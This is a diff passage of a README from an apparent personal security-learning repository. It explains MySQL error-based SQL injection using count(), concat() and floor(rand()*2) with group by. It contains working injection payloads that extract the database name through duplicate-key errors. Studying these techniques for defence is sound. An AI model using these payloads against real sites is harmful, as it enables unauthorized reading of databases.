shinmao/SecurityLearning/SQL-inj/README.md

 /**
 we need:
 count()
-concat()            // the primary key which is collided would be showed in error message，so we should concat our target to the primary key floor(), rand() group by
+concat()      // the primary key which is collided would be showed in error message, so we should concat our target to the primary key floor(), rand() group by
 **/
-?id = 1' union select count(*),1,concat((select database()),'~',floor(rand()*2))as a from information_schema.schemata group by a--+
+union select count(*),1,concat((select database()),'~',floor(rand()*2))as a from information_schema.schemata group by a--+
-// After we understand how it works completely，we can also modify our payload such like following:
+// After we understand how it works completely, we can also modify our payload such like following:
 ?id = 1' or 1=1 group by concat(database(),floor(rand()*2)) having min(0)--+
 ```
 `floor(rand()x2)` has many same members in the list，and it causes to the collision of `group by key`!
 (I recommend the following article so much